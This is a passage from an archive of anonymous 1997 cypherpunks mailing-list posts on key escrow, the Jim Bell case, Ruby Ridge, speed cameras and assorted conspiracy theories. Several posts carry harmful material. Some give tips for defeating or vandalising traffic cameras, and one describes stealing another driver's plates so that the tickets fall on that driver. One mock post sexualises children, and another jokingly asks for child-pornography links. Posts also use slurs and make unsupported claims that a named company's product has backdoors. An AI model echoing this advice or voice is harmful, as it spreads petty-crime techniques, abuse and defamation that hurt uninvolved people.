sojourn into the bowels of Cryptocracy.
If you enjoy browsing leisurely through odd piles of obscure posts
on all of the above, and more, the Infinity website CPUNX archive
can be found at   (Of particular classical value are the many [ADMINISTRAVIUM]
  posts which contain valuable graphical representations of
  some of the more arcane CPUNX traditions.)

@_date: 1997-10-31 19:55:31
@_author: Anonymous 
@_subject: The reason we need to give up our rights... 
We are told that we must give up our right to privacy in order for the
government to protect us from the horrors of child molesters, et al.
Recently, a Canadian man was charged with 572 instances of having
individual and group sex with pre-teenage boys. He was sentenced to
a 'duece-less' (two years less a day), which is 'soft time' in Canada,
and is served in a provincial jail instead of a federal institution.
We are expected to give up our right to privacy so that the sores on
our children's bums can be healed just in time for this guy to get out
and have another go at them?
Would it be ridiculous to suggest that the government *needs* this man
back out on the streets in 16 months (if he does 'good time') because there is a shortage of child molesters to hold over our heads for their
next attack on our rights and liberties?
Hell, give Tim McVeigh a pardon, and then use it for an excuse to make
use of compost in the commission of a crime a felony.
Personal not to FedUpMonger:
I'm just OldAndTiredMonger. I don't need this shit anymore.

@_date: 1997-10-31 20:32:37
@_author: Anonymous 
@_subject: Protocols for Insuran 
> The Emergency Room Scenario is a little more challenging.  One
 > way to deal with it is to wear some obvious signs of wealth like
 > a $10,000 watch.  In a pinch you can give them the watch. ;-)
 > (Some of the nurses won't know what it is, but the doctors will,
 > I am sure.)
Except that very likely you'll be in the Emergency Room in the
first place, because you got shot during the mugging for your watch
Does that count as "evolution in action" too? :)

@_date: 1997-10-31 20:57:01
@_author: Anonymous 
@_subject: Protocols for Insuran 
> Actually, the real "sucker rates" are the amounts small  >
 > businesses pay for insurance.
 > The big businesses (who can buy in bulk) get a pretty reasonable
 > deal for what they get.  The smaller companies who cannot
 > bargain the  price down get screwed.  (The rate my wife's
 > employer was paying was close to double what my insurance costs
 > and it covered ALOT less.)
 > I seriously doubt that most people could afford to self-insure
 > at the going rate.  (Not unless they have some serious income
 > they want to get rid of.)
Think of this as "evolution in action"

@_date: 1997-11-01 04:14:12
@_author: Anonymous 
@_subject: Jim Bell sentencing delayed 
Aleady confirmed, upon researching a theory that Jim's 'letter
of pennance' was calculated to warn anyone with half-a-brain that
it would be unwise to put a lot of trust in either himself or anyone working with information gleaned from the search/seizure
and/or prosecution of James Dalton (Gang?) Bell.
  It is standard procedure to delay punishment in cases where:
a) The narcs are *hoping* to 'turn' the individual, and need to
  string out their control over them (which diminishes rapidly
  once their fate is confirmed).
b) The narcs *already have* turned the individual and are unsure
  if the person is yanking their chain, trying to get a done deal
  without giving up conspirators yet-to-be-born, as promised.
  (Known as "the unborn" by the spook-oriented.)
c) The narcs have a 'done deal' with the individual, and need to
  postpone any signs of a 'sweetheart deal' so as not to spook
  (pardon the pun) the targets of an ongoing investigation.
d)  The warrants are in the mail and the individual's sentencing
  is dependent on future testimony/cooperation.
e)  The spooks are having trouble finding the right combination of
  chemicals to twist the individual's mind into a willing vessel of
  their mind-control plans for them as a suitcase salesman.
  Delay is usually used when they've gotten some backwoods legal
aide dupe to sell their client down the river unwittingly, and
they want the individual to spend as much time as possible in
jail before finding out at his or her sentencing that they have
gotten totally screwed and they go out and get themselves a good   Not the case, here. Jim's lawyer knew where his future career
was buttered. Nobody unwittingly lets their client get stomped
on that badly and refuses offers of outside assistance, without
being a part of the plan.
  Nope.
  Nope. But they could very well be trying to manipulate him into
turning on others, OR (listen closely...) 'pretending' to turn on
others without really giving them up, and turning his own past
non-crimes into real-crimes in the process.
  e.g. - "I don't know if John Young was *serious* about what he
said in that email to me, but I could find out, once I am out of
here."   This is a true toilet-plunger maneuver, with the individual led
to 'making' his past actions criminal with the statements he makes
today. 'Wise guys' are susceptible to this, being too smart for
their own good, and thinking they can walk with the Devil as far
as the Bridge. a) A definite possibility, but extremely difficult to confirm.
McVeigh, for instance, did everything but wave a red flag to get
his ass picked up. Tough to tell a 'death wish' from personal involvement in 'the plan.' b) Jim and Tim were both 'led to believe' that they were 'part of
the plan' and will continue to believe so until it becomes obvious
that the burning coals being prepared in the pit are for them, at
which time it is a little late to start saying, "Actually, the
*real* story is..."
  Not *that* court. That one, like the one in Denver, is a *home*
court, with *home* referees and officials.
  It's tough to win in Vegas, unless you're *from* Vegas.
(Nobody calls from Vegas just to say "Hello.")
  We can only dream...
9. 'C'hoate, 'C'hudov and 'C'ottrel are actually running the CDR list from a cell adjoining 'B'ell's, and those whose names begin with
a 'D' will be the next to join them.
  (The narcs are saving the 'A's for last, because they can't figure
out who the hell 'Anonymous' is.)

@_date: 1997-11-01 10:50:00
@_author: Anonymous 
@_subject: You *know* what this means, don't you? / Re: [ZOG] FBI MEMO FROM MSP SPEC OPERATIONS DIV 
This is the FBI's way of informing the IRS that the everyday working
citizen is now an enemy of the government, and likely to lay seige to
any government office foolish enough to stay open during hours when
the regular American Joe and Jane has time to do a quick drive-by on
the way to pick up the kids at the Saturday afternoon movie at the

@_date: 1997-11-01 10:55:01
@_author: Anonymous 
@_subject: Jim Bell--Mercetan Visionary / Re: [ZOG] FBI MEMO FROM MSP SPEC OPERATIONS DIV 
Clueless John Young was mystified as to why Jim Bell's sentencing
has been delayed for such a long period of time.
You fool! They plan to run him for President as a grass-roots candidate.
Glad I could clear that up...
Anonymous (Except to John Young, who is cc:'d and will know ~~~~~~~~~  I am TruthMonger)

@_date: 1997-11-01 12:03:31
@_author: Anonymous 
@_subject: Hi! I'm only twelve years old! 
Hi. I'm only twelve, but I'm a real dork, and nobody will talk to me
in the chat rooms.
I was watching 20/20 tonight about sexual predators on the internet
and they had some really cool tips about how to prey on young children.
{If only one child is raped and murdered by sexual predators who learn
 how to use the internet effectively, it will be worth the time and
 trouble for those producing the show.}
Anyway, I have a question for you.
Would I get more people talking to me on the chat lines if I say that
I am a twelve year old interested in sex, or if I say that I am a
sexual predator interested in meeting young boys?
I have never talked to a real FBI agent before and I know I would get
to meet some if I said I am an old fart who wants to bunghole young
boys but they would probably tell my parents, wouldn't they?
I bet I could get a lot more people to talk to me if I told them how
old I really am and that I want to do dirty stuff with old farts. I bet
I could get a lot of free stuff, too.
What do you think? I am asking you because my Doctor in Forest Hills
says you guys know about that stuff. He's not a real doctor, but he
meets me in the park, where I can smoke, so I like him. He says I don't
have prostrate cancer. Boy is that a relief!
I met him in a chat room. He said, "I'm from the cypherpunks, and I'm
here to help you." I found out that his name isn't really John Gilmore,
it's some kind of foreign name, I think. When I asked him if he was
a "real" doctor, he said, "No, but I have an honorary Doctor of Love
degree that was bestowed upon me by the grade four class at the Forest
Hills pubic school." (I think he was making a joke. :?)
I thought I could get people to talk to me on the cypherpunks list,
since you guys are cool, but everyone there thinks I am an asshole,
too. I think I am going to change my name from TruthMonger to something
Do you think that would help?
I spell pretty good for a twelve year old, don't I?
A Twelve Year Old Boy
p.s. - What is fist fucking? Phillip Hallam-Baker wants my answer by
       tommorrow.

@_date: 1997-11-01 13:20:42
@_author: Anonymous 
@_subject: Hlep 
Q. How many cypherpunks does it take to change a light bulb ?
A. %5-3E,*5$%"4TE:10IA8F-D969G:6ML;6YP<7)S='5W.GA!0D-&

@_date: 1997-09-02 01:44:48
@_author: Anonymous 
@_subject: No Subject 
of a
Humans can be very kind and polite, or they can just be murdering
So in Dave's defense, despite the fact he made an argumant sounding
like he was on crack, I have to say that plungering someone is part of
human nature.  We're all capable of things along that line, and anyone
who thinks otherwise must have forgotten about the holocaust.
Does that make it any less wrong to do that?  Fuck no.  That cop
should still go to prison for life, at least.

@_date: 1997-09-02 12:38:03
@_author: Anonymous 
@_subject: Hey 
I find this highly unlikely. If you check the archives, you will find that this has been discussed previously on the list, and has been
discounted by anyone with a modicum of reason.

@_date: 1997-09-03 06:54:37
@_author: Anonymous 
@_subject: New Eternity Server? 
Is there an eternity server named "Forever Young?" Perhaps someone
should start one up, and use it a place to send posts that don't really
belong on any particular mailing list, because no one can quite figure
out what they mean, but should be available to read somewhere, because
they clearly say something that it is important to know, but nobody can
quite figure out what it is.
The web site could carry a "Je Ne Sais Quois" rating.

@_date: 1997-09-03 12:56:08
@_author: Anonymous 
@_subject: Death Pictures of Diana on InterNet!!! 
In a case of Worst Timing Ever by an advertiser, Weight Watchers flyers
hit the mailboxes in our area on Friday.  They feature a cheesecake shot
of Lady Sarah Ferguson, Duchess of York, saying that losing weight is:
    "HARDER than outrunning the papparazzi"
I guess fat people are doomed.

@_date: 1997-09-03 14:21:08
@_author: Anonymous 
@_subject: Missing Kids and Porn Links 
I agree. Does anyone have any pointers to child pornography sites, so that I can
warn people which sites to avoid?
T.C. Mayonnaise "Hey little girl, want to make some mayonnaise with _real_ eggs?"

@_date: 1997-09-04 09:55:55
@_author: Anonymous 
@_subject: Big Brother is watching 
It's Fairfax City, I think, which is an independent city wholly contained
in Fairfax County. At least they were the only ones with this shit deployed.
This was discussed a while ago. Buy a license plate cover ("Just protecting my
plates against stones and vandalism, Officer!") that's virtually transparent
from head-on, but opaque beyond  a certain view angle. I think these things
exist -- look in Car & Driver or some such.
And if some peckerhead parks his SUV in your driveway to nail speeders, buy a
"radar detector tester" (maybe C&D, or an electronic-hobbyist's magazine) and
crank it up every now and again while he's trying to catch violators. Do it
from the safety of your house so you don't wind up with a nightstick up your
And I'll give my kids a can of spray paint and a ladder. Maybe I'll offer bonus prizes if they can figure out an inventive, undetectable way to disable
the fucker.
Shit, they're trying to nail Marv Albert for consensual sodomy, which is also
a "crime" in the PRV, if they can't get him on the assault charges. So think twice before you and your SO get into acts of Hooverism down Virginia way.

@_date: 1997-09-04 14:00:04
@_author: Anonymous 
@_subject: FBI calls for mandatory key escrow 
The 'authority' comes, as always, from power and money.
  The "Drive 55" mandate is a perfect example of the government stealing
the citizen's money, then giving it back in the form of highway funding,
with the condition that those states who don't give up their right to
decide their own state laws don't get any cash.
  The greedy fucks feeding at the government troughs want to get their
hands on that money _now_, because there is no telling who will be ahead
of them in at the trough by the time the Constitutional issues are
  The bottom line is that the federal government gets their authority by
virtue of armed robbery, bribery and illegal seizure.
  Who is going to stop them? They have the guns! When our elected
in Congress delved into the INSLAW affair, the Department of Justice
them to "Fuck off." and refused to cooperate with those who represent
citizens. Congress's reaction was to say, "Yup. They're defying us."
  Ipso facto--Congress is not running the country. The LEA's are running
the country. Go figure...
TruthMonger # -23A(Sub.C)-009

@_date: 1997-09-04 14:13:32
@_author: Anonymous 
@_subject: Militias 
I watched the show and couldn't figure out exactly what the 'crimes'
were supposed to consist of. I eventually got the impression that the
real 'crime' was "intent to have a bad attitude."
  My basic read is that they are going to fuck with those they don't
like until their sense of human dignity forces them to make a stand,
and then they will murder them and use the event as more evidence of
our need to be protected from 'unauthorized' nuts with guns.
  I don't know about you, but I would much rather get murdered by an
'authorized' nut with a gun, than an 'unauthorized' nut with a gun.
It seems so much more civilized, somehow.
  When militia members leave for their meetings, do their mothers
remind them to put on clean underwear, in case they get murdered by
law enforcement agents? This is what cypherpunks enquiring minds
really want to know.

@_date: 1997-09-04 16:57:45
@_author: Anonymous 
@_subject: Big Brother is watching 
For some reason this made me think of the thread containing light-bulb
jokes, and some warped wit saying,
  "Sure, light bulb jokes are funny, until someone burns a retina..."
  Though I laughed my ass off, at the time, have things really begun to
deteriorate so rapidly that I am justified in now wondering if there
will be a "Light Bulb Joke Amendment" to the "Telescopic Lens

@_date: 1997-09-05 04:27:25
@_author: Anonymous 
@_subject: Big Brother is watching 
Their is a pair of on-off ramps in the Bay area where they have the
PhotoCop Bots on both sides you can get nailed both ways if you circle
back and forth.
  I like to steal the plates off of a matching vehicle late at night
and spend an hour or so speeding back and forth between the exits, then
replacing the plates on the vehicle when I'm done.
(Hint: wear a cap and glasses with the big clown nose.)
  Not that I'm a troublemaker...

@_date: 1997-09-05 05:39:41
@_author: Anonymous 
@_subject: Feinstein first...then Clinton..._then_ the lawyers! 
And while Clinton on July 1 took a very public stand for a tax-free, self-governed Internet,
In contrast to Clinton's support of proposals like the Internet Tax Freedom Act, which would prohibit states from taxing online commerce,
  Excuse me? Sounds like a 'State-tax'-free InterNet.
  The proposal to give the States money for welfare and let them decide
how to disperse it is the preliminary move toward dropping the funding
levels and let the States bear the burden of the fallout from the new
welfare 'reforms'. First you dump it in the lap of the States, then you
cut back funding, and you let the citizens cry out to D.C. for help,
at which time you take away even more of their rights in return for
"protecting" them from the evil States, or you turn them into slave
labor for big corporations, like you did with the people in your
  Once the States are prohibited by law from taxing online commerce,
D.C. will suddenly discover the great "crisis" that will ensue when
the citizens find out how to dodge taxes, and the Feds will step
forward to "save the day" by announcing a Federal InterNet commerce
tax, promising to "share" it with the States. (Of course, the States
won't _get_ their share if they don't force their citizens to drive
55 mph and work 20 hours a week in the voluntary-mandatory Federal
Re-election Campaign Fund Work Camp.
During discussion of the Kerrey-McCain bill in July, Feinstein left before her constituents from the software industry in the Silicon Valley testified -- and after telling representatives of the FBI and the National Security Agency that she would defer to their expertise on what was a confusing issue.   I didn't see the FBI or the NSA on the election ballot. Did you?
  I ask you, "WHO THE FUCK IS RUNNING THIS COUNTRY?!?!?"
  Where does this Nazi CUNT get off telling the people who elected her
that she can't be bothered to make the effort to understand the issues
involved so she will let nameless, faceless government Law Enforcement
Agents make the decision as to what to do with the encryption plunger.
NEWS FLASH!!! --- THIS JUST IN...
  The pilot of a U.S. nuclear bomber left formation before receiving
her flight orders from the Pentagon--and after telling Tim C. May
and James Dalton Bell that she would defer to their expertise on
what was a confusing issue (where to drop the BIG ONE).
  President Clinton, when reached for comment, said, "Didn't we fire
that slut from Minot Air Force Base? And what the fuck is Paula Jones
doing up there with her? Say...what is that plane............"
In solidarity, we remain...
KentCrispinMonger

@_date: 1997-09-05 05:50:19
@_author: Anonymous 
@_subject: FBI calls for mandatory key escrow; Denning on export ctrls 
September 4, 1997
   Encryption Tops Wide-Ranging Net Agenda in Congress
   By JERI CLAUSING
The word encryption traditionally conjures images of spies and sophisticated international organizedcrime rings. But with the dawn of the Internet, it is also the key to private communication and secure
business transactions. And while Clinton on July 1 took a very public stand for a tax-free, self-governed Internet, his administration is pushing to create a key-recovery system that would keep encrypted codes on file for law enforcement officials to access.   Translation~~These ratfuckers are trying to keep a low profile until
they can get all of their draconian legislation passed, at which time
the sheeple will find out why the "rubber boots" rider was attached to
the legislation.
  How long before the Great InterNet Tax Avoidance Crisis (TM) requires
them to access the records of all companies and individuals in order to
make certain that the royal "we" are not "cheated" by our evil fellow
"Law enforcement needs to have a system for immediate decryption" when a judge determines it is likely that crime is being or is about to be committed, Freeh told the Subcommittee on Technology, Terrorism and Government Information. "We should also look at whether network service
providers should have a system for immediate decryption." Translation~~"Just as we need to be able to beat the citizens and shove toilet plungers up their ass if we have reason to suspect that they
have knowledge of a crime in their mind."
  Freeh wants to make certain that the citizens don't have the same
ability as the Whithouse, the Department of Justice, Congress, etc.,
to LIE to the courts, to the people, to each other. So if _we_ steal
a private company, murder members of a religious sect, get filthy
fucking rich on inside deals, then _we_ will go to jail.
"What part of 'Nuke the Bastards!' don't they understand?"

@_date: 1997-09-05 06:11:04
@_author: Anonymous 
@_subject: One Smart Polack (Was: Students of Hitler) 
Vin Suprynowicz,   vin at lvrj.com
"A well-regulated population being necessary to the security of a police
state, the right of the Government to keep and destroy arms shall not be infringed."

@_date: 1997-09-06 04:38:08
@_author: Anonymous 
@_subject: Dianaism Was: Re: Di and Dodi Run Over A Land Mine 
I have already seen one newscast which has predicted that Diana will
join Elvis as a diety-figurehead.
So, now that we have a King _and_ a Queen, why don't we start a new
nation? They would be the perfect titular heads for a Virtual Nation,
because their lifestyles would be inexpensive for us to maintain, no matter how lavishly we choose to treat them.

@_date: 1997-09-06 09:29:47
@_author: Anonymous 
@_subject: Political News from Wired News 
have you seen any pictures of the concrete pillar that apparently
totally destroyed an automobile built like a tank? does it even have
a single scratch on it?
anybody figure out how a papparazzi scooter managed to get ahead
of a car and zig-zag at 120 miles per hour? anybody figure out
why 'facts' such as these changed back and forth several times when
it became obvious that you could drive a Mercedes semi-truck through the holes in the original story?
i agree that there is something weird going on with the reporting of
the mainstream press and their affiliates.
i'm not looking for mountains of negative sensationalism replacing a
balanced perspective, but I have to wonder why nobody is seriously
questioning  the possibilities of the 'dark side' of anti-4-Horsemen legislation, or reporting the real details surrounding the sudden death
of a rich Egyptian mobster and the mother of a future King of England.
i am getting a very bad feeling that maybe the level of inside/outside
censorship of the press may be a good indicator, like the Doomsday Clock, of how close we are to the day when the Puppet Masters finally
step out from behind their masks.

@_date: 1997-09-06 15:12:20
@_author: Anonymous 
@_subject: Mars Rover Fraud 
I happened across a web site, that promised to reveal the _real_ pictures from the Mars Rover, instead
of the _fake_ ones released to the public.
Since I found the web site regarding the "faking" of the Apollo moon
landings amusing, though totally unbelievable, I decided to view the
claimed Mars Rover fakery conspiracy theory, as well.
  Imagine my amazement when one of the claimed _real_ pictures contained
a view of a wristwatch that I had lost in the Desert outside of Tucson
a few years ago. Even the inscription from my mother was still legible!
I'm warning the spooks on this list that if I don't get my wristwatch
back, I'm going to blow the lid off of their whole Mars Rover scam
in Smile magazine. I'm serious!
Monty Cantsin
Editor in Chief
Smile Magazine
"I AM a number!  I am a free man!"

@_date: 1997-09-07 10:50:34
@_author: Anonymous 
@_subject: Toto UnMasked!!! 
And in June, authorities in Cincinnati, Ohio, removed
three toddlers from the feces-strewn bedroom they were locked
into for up to 12 hours a day; their mother, Sandra Hacker,
allegedly did not want them disturbing her while she was on the
Internet. News of the Weird
  by Chuck Shephard

@_date: 1997-09-07 22:24:10
@_author: Anonymous 
@_subject: GAK Ploy 
Is this list turning into some kind of comedy club. Litt (rhymes with
..) couldn't lie straight in bed.
I spose implanting a nuclear devise up clit-ons ass doesn't necessarily mean that it will inevitably lead to it being turned on..just that most people would like to see that happen while he's in Washington DC.

@_date: 1997-09-08 14:19:18
@_author: Anonymous 
@_subject: Show Me the Warheads! 
Lying Nazi Ratfucker Freeh has known about these allegations for a long
time, but it seems that it was not much of a threat until the release
of the book by his co-conspirator schill, the Russian General.
Isn't it amazing how long-standing threats to National Security only
become _real_ threats when it is convenient for those in power?
It was only a 'coincidence' that I happened to be standing in that bank
that had been broken into, with a handful of cash.

@_date: 1997-09-08 14:22:05
@_author: Anonymous 
@_subject: FUCK! how do i unregister from toad.com or the 2 other server ?% 
If you are retiring as Cypherpunks Chief Spokesperson then I guess
we will have to hold a new election. Do you have anyone in mind as
your replacement?
A Registered Cypherpunk Voter

@_date: 1997-09-08 17:09:19
@_author: Anonymous 
@_subject: Suitcase for sale - $1,000,000 
Weight of suitcase: 80 lbs.
For details contact: toto at sk.sympatico.ca
Get Your Private, Free Email at

@_date: 1997-09-09 07:56:38
@_author: Anonymous 
@_subject: GAK patents, anyone? 
Anyone want to guess how long until they will give 'key escrow' systems
special protection?  (Actually that would be a good thing, because it would make GAK more
expensive :-)
Petitioning to Make Special Patent Applications Relating to
Inventions For Countering Terrorism
New patent applications are normally taken up for
examination in the order of their effective United States
filing date.  However, the Commissioner may provide that a
patent application will be advanced out of turn for
examination if a petition to make the patent application
special under 37 CFR 1.102(c) or (d) is granted.
On July 31, 1996, Vice President Gore stated that [i]t is
imperative that those seeking to prevent terrorist
activities have all of the tools necessary to accomplish
their task.  In view of the importance of developing
technologies for countering terrorism and the desirability
of prompt disclosure of advances made in these fields, the
Patent and Trademark Office is establishing a new category
for petitions to accord "special" status to patent
applications relating to counter-terrorism inventions.
International terrorism as defined in 18 U.S.C. 2331 is
activities that
(A) involve violent acts or acts dangerous to human life
that are a violation of the criminal laws of the United
States or of any State, or that would be a criminal
violation if committed within the jurisdiction of the United
States or of any State; (B) appear to be intended (i) to
intimidate or coerce a civilian population; (ii) to
influence the policy of a government by intimidation or
coercion; or (iii) to affect the conduct of a government by
assassination or kidnaping.
The types of technology for countering terrorism could
include, but are not limited to, systems for
detecting/identifying explosives, aircraft sensors/security
systems, and vehicular barricades/disabling systems.
Applications which are made special will be advanced out of
turn for examination and will be treated as special
throughout their pendency by the Patent and Trademark
Applicants who desire that an application relating to
inventions for countering terrorism be made special should
file a petition, with the fee under 37 CFR 1.17(i) which is
presently $130.00, requesting the Patent and Trademark
Office to make the application special.  The petition for
special status should be made in writing, should identify
the application by application number and filing date, and
should be accompanied by a statement explaining how the
invention contributes to countering terrorism.  Such
statement must be set forth in oath or declaration form
unless it is signed by a registered practitioner.  The
petition will be decided by the Director of the patent
examining group to which the application is assigned.
This new category for a petition to make an application
special will be added in the next revision of the Manual of
Patent Examining Procedure (MPEP) to the other categories
discussed in MPEP section 708.02.
Questions concerning this notice should be directed to
Magdalen Y. Greenlief, Office of the Deputy Assistant
Commissioner for Patent Policy and Projects, (703) 305-8813.
Bruce A. Lehman                         Dated: August 19, 1996
Assistant Secretary of Commerce and
   Commissioner of Patents and Trademarks

@_date: 1997-09-09 09:15:17
@_author: Anonymous 
@_subject: Deja Vu / Re: Info please 
Always wear clean underwear in case you get hit by a car.

@_date: 1997-09-10 01:07:46
@_author: Anonymous 
@_subject: Suitcase for sale 
Weight of suitcase: 80 lbs.
Scheduled to check in; check the weight.
For details contact: toto at sk.sympatico.ca

@_date: 1997-09-10 01:56:10
@_author: Anonymous 
@_subject: Chelsea Clinton's PGP 
Stanford Newspaper Promises to Help Chelsea Clinton Keep Low Profile
   AP
   08-SEP-97
   STANFORD, Calif. (AP) Don't look for news about Chelsea Clinton in
   Stanford University's school paper: The editor is promising to treat
   the first freshman like any other student.
   Chelsea, accompanied by her parents, is expected on campus Sept. 19,
   when 1,600 first-year students move into their dormitories and begin
   several days of orientation.
   Like the mainstream media, the Stanford Daily plans to cover the
   Clintons' arrival and their participation that day at a welcoming
   ceremony for freshmen and their parents.
   But after that, said Carolyn Sleeth, the Daily's editor in chief,
   Chelsea "will be treated by us as a student, a regular student."
   That means her classroom and social life will largely go unreported.
   "Of course, if she involves herself in a newsworthy event, we'll cover
   it for example, if she founds a Stanford Democratic Club," Sleeth
   said.
   On the other hand, the student editor said if Chelsea were to get a
   speeding ticket or violate some minor campus rule, it would be
   ignored.
   "We wouldn't do a story if another student got a speeding ticket,"
   Sleeth said.
   Sleeth also said a gag order of sorts will be imposed on Daily
   employees, barring them from talking or as she put it, "punditing"
   with the "outsider press" about Chelsea. Anyone who does so will be
   fired, she said.

@_date: 1997-09-10 02:06:44
@_author: Anonymous 
@_subject: Net Papa: Global Internet Taxes Inevitable 
(09/09/97; 12:00 p.m. EDT)
   By Douglas Hayward, TechWire
   GENEVA -- Internet taxes are inevitable, according to the man dubbed
   the "Father of the Net." The only way to avoid global chaos is to
   create an international agreement on how to do it, added Vint Cerf at
   a meeting of the Internet Society here. Cerf co-developed the
   TCP/IP[LINK] protocol on which all Web and Net transaction depend.
   ...Taxation of the Internet, also called "bit taxes," must be well
   planned, Cerf said. "And it must also be thought through on a global
   scale -- not parochially," he said. In the United States. alone, there
   are 30,000 taxing authorities that might be interested in taxing
   transactions on the Internet, said Cerf, adding that right now, there
   is no way to determine which of those authorities should have
   jurisdiction over a particular transaction.
   ..."If something is becoming an infrastructure that is important for
   people's daily lives, then governments will have the right to be
   concerned about the public's safety and well-being," Cerf said. "When
   you build roads, you make rules about how people are to behave on
   these roads, in order to protect people." TW

@_date: 1997-09-10 08:07:12
@_author: Anonymous 
@_subject: Credit Card might-as-well-equal SSN 
[stuff cut]
It has been some time since I have seen an actual credit report, but as I
remeber, TRW and CBI both report the persons SS# when you do a credit
check. CBI has a search by SS# that will give you credit history and
address from a SS I did quite a few credit checks in my younger, more
criminalistic days..

@_date: 1997-09-10 14:56:30
@_author: Anonymous 
@_subject: GAK patents, anyone? 
I was just granted a copyright on all of Tim May's 'Nuke DC' posts.
Every time he quotes them, he owes me a nickle.
Jim Bell, too.
God, I *love* this government.
? the lunatic
p.s. - CypherPunks posts are now considered munitions under the
secret laws that nobody knows about. Remember, ignorance of the
secret laws is no excuse.

@_date: 1997-09-10 14:56:40
@_author: Anonymous 
@_subject: Bright, Loud and Quick OR...? 
They are legal to own, as long as you don't carry them concealed on
your physical person.
It is legal to keep them in a locked suitcase.
Only two left. 10% discount for cypherpunks.
Can drop-ship to destination of your choice for no extra charge.
(I'll need the cash up front if you live in the DC area.)
"The Xenix Chainsaw Massacre"
"WebWorld & the Mythical Circle of Eunuchs"
"The Final Frontier"

@_date: 1997-09-10 15:05:21
@_author: Anonymous 
@_subject: Government shows its hand...good news! 
Read it and think about it...
This kind of bureaucratic dildo is a subtle way of affording the Lying Nazi Fucks (TM) in power a way to _interpret_ the law unconstitutionally
without having it subject to "judicial review."
Ipso facto, you are mucho fuckedo by an unconstitutional interpretation
of a constitutional law.
Add to the above, the fact that unelected semi-secret committees of administration appointees will be exchanging bum-buddy favors with
the people doing the interpreting, and you will find a set of 'established' procedures--from the White House down to the lowly
clerk that stamps "Denied" on your application to speak your native
tongue during overseas phone calls--which will _support_ the fascist's
case if you ever _do_ manage to get them into court.
(Much like the post of our Cpunk avon lady who sent the CFA post down
showing how the Alberta lawyer got suckered into comparing his stance
against gun registration to an 'established' unconstitutional law
against handgun registration.)
The deciding factor in a case such as this, from my experience, is
when the government whines about the terrible burden they would be
placed under if they were forced to go out and by an "Accepted"
rubber-stamp, at which point the judge decides that this would
take away from the available funds for nuclear warheads, and then
National Security would be compromised.
Ruling: Citizens, assume the position.

@_date: 1997-09-10 19:40:38
@_author: Anonymous 
@_subject: C2Net bastards (Was: Mondex Broken 
For those who still don't know what Tim May means, the barratrous
threats came from the crypto snake oil peddler C2Net and its Arab
owner Sameer Parekh.
Sameer's "product", StrongHold, is a hacked version of the free Web
server Apache, and has more backdoors and security holes than
Swiss cheese.

@_date: 1997-09-11 03:10:46
@_author: Anonymous 
@_subject: House National Security committee guts SAFE, worse than no bill 
You could take a much bolder stand by using your real name.

@_date: 1997-09-11 03:10:48
@_author: Anonymous 
@_subject: Infoworld and Denning's study (fwd) 
Maybe the government will pass a law requiring criminals to all turn
themselves in. Then we won't need LEA's. (And we will no longer have
a government.)

@_date: 1997-09-11 03:14:03
@_author: Anonymous 
@_subject: House National Security committee guts SAFE, worse than no 
*IF* they succeed? (You been on extended vacation?)
  Any bets that the double-secret guys nab a suitcase-nuke carrying dark-skinned person a few days before they need to win a crucial vote
in the war against the citizens?

@_date: 1997-09-11 03:16:28
@_author: Anonymous 
@_subject: Is Your Web Site A Secret? 
Thought the Feds found my AP Bot. Almost had a heart attack.

@_date: 1997-09-11 07:29:52
@_author: Anonymous 
@_subject: Renaming TEA remailer 
Generic terms can't be trademarked.
  Did they provide you with the UK or European trademark number? If not,
the claim likely is fraudulent.

@_date: 1997-09-11 13:40:56
@_author: Anonymous 
@_subject: Mondex 
Timmy May's IQ is lower than the belly of a pregnant snake.
     _  o
<)_/# Timmy May
    TT  <T

@_date: 1997-09-11 23:23:46
@_author: Anonymous 
@_subject: THE COSMOS THE UNIVERSE 
The question is not: "Is this guy getting good Acid?"
The question is: "Did he bring enough for *everybody*?"

@_date: 1997-09-12 01:33:24
@_author: Anonymous 
@_subject: Bullshit! / Re: in defense of Lon Horiuchi 
Personally, I think you are both 1/2 full of shit, for a grand total
of Bullshit!
It is fortunate that, in my position of Chief CypherPunks Spokesperson,
I am able to set you both right in the interests of Truth, Justice, and
an Uzi in every pot (bag).
I have no problem with people who enter law enforcement with the genuine intention of attempting to serve the ends of equal justice
being applied among the citizens in a reasonable manner.
I *do* have a problem, however, with the fact that the high level
of integrity and responsibility that *should* go hand in hand with
that manner of _public_service_ has in many ways been abandoned to serve the convenience (*not* "legitimate needs") of law enforcement
We all know that if we had approached the FBI before they found the
guy, and *guaranteed* that if they gave us six men for thirty days
we would bring their man into custody, they would gladly have given
us what we asked, if the alternative was to let him go free.
When it comes to avoiding the loss of innocent lives, however, the
motivation to "do whatever it takes" seems to be more lacking. To
me, this is unconscienable.
A good example is the many lives that have been lost over the years
in dangerous high-speed chases over nickle and dime bullshit, merely
because the 'good guys' main interest was to get a good adrenaline
rush in their pursuit and capture of their prey, however small-fry
that prey might be.
Only when enough blatantly senseless tragedies had taken place, was
there any attempt to introduce the discretion of the "reasonable
man" in the slightest manner such as it is applied to the normal
citizens in the judgement of their actions according to the law of
the land.
The fact that the victims were killed by a 'missed' shot which went
through a door, does not lessen the responsibility of the agent who
chose to use deadly force to understand the potential of the weapon
he was using.
If Zooko shoots a cop by firing into a steel wall with a cannon, he
is unlikely to get cut much slack by saying, "It never occured to
me that could happen."
I don't know the FBI agent who fired the fatal shot. He may be one
of the nicest and most well-intentioned people in the world. However,
I have personally known too many law enforcement personnel who had
far more interest in exercising egoistic authority, or getting an
adrenaline rush from risky situations, than in bringing the end goals of law enforcement to a safe and just end for all involved.
I find it hard to believe that the end result of the standoff was
not the result of impatience and convenience rather than the way
things truly needed to be.

@_date: 1997-09-12 02:09:56
@_author: Anonymous 
@_subject: in defense of Lon Horiuchi 
Zooko Journeyman quoth:
About the best spin that you can put on this is that the agent was
trying to shoot (again) the retreating Randy Weaver and showed an
utter disregard for the safety of the others in the cabin; who were
known to include women and children.
This is the point.  Not that all Fibbies are demonic baby-killers
but that the arrogance of their agency and its government allow them
to mark someone--Randy Weaver or even Jim Bell--as 'bad guy' and
call out unreasonably huge campaigns against them.  Once so marked,
the "victim" is then helpless, completely without recourse, the
"justice" system by then having been poisoned against them by the
Fibbies and the prosecutors.  [For those that survive long enough
to have an encounter with the justice system.]
I don't find that at all reasonable; since Weaver was on his own
property, minding his own business before agents started shooting
at him.  Yes, I know he was wanted for failure to appear for a
court date--that hardly justifies the whole exercise.
Perhaps he didn't chuckle gleefully, but he obviously didn't
show much regard for the Weavers' lives either (/before/ Vicky
Weaver's death that is).  BTW, neither I nor anyone else has
accused him of killing a toddler.
Yes, I can see why you would recognize such a smell.

@_date: 1997-09-12 06:59:57
@_author: Anonymous 
@_subject: Cypherpunk Press <sarcasm> 
